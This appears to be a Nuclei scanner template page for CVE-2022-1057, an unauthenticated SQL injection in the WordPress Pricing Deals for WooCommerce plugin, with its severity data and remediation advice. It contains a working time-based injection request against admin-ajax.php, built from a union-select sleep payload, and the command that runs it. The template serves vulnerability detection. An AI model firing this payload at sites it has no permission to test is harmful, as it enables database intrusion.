WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
ID: CVE-2022-1057
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech
Description
Section titled “Description”WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2022-1057
info: name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection author: theamanrawat severity: critical description: | WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the Pricing Deals for WooCommerce plugin (2.0.2.03 or higher) to fix the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243 - https://wordpress.org/plugins/pricing-deals-for-woocommerce/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1057 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1057 cwe-id: CWE-89 epss-score: 0.03633 epss-percentile: 0.9168 cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: varktech product: pricing_deals_for_woocommerce framework: wordpress tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech
http: - raw: - | @timeout: 15s GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 500' - 'contains(body, "been a critical error")' condition: and# digest: 4a0a00473045022071e2d1d9b244c67e680c7dcf213608685eb256c0a0b92056e0015fbbba92b915022100f08dfea49fc7be278d7943e3c384949493467373a3844234aaf60ed4d2f2a545:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1057.yaml"